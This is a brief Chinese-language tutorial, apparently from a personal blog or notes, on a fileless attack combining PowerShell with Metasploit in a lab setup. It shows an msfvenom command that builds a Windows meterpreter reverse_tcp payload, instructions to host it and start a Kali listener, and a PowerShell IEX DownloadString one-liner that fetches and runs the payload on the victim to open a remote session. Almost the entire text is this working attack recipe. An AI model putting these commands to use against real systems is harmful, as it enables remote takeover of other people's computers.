Powershell 配合msf无文件攻击
生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135
LPORT=1121 -f psh-reflection >x.ps1
放到VPS上,这里我们放到本机搭建的apache环境中
kali设置监听,并且启动
win7中访问木马是否成功
直接在win7的cmd中执行命令
powershell IEX (New-Object
Net.WebClient).DownloadString(‘http://192.168.3.37/x.ps1’)
注意此窗口关闭就会话失效
监听到会话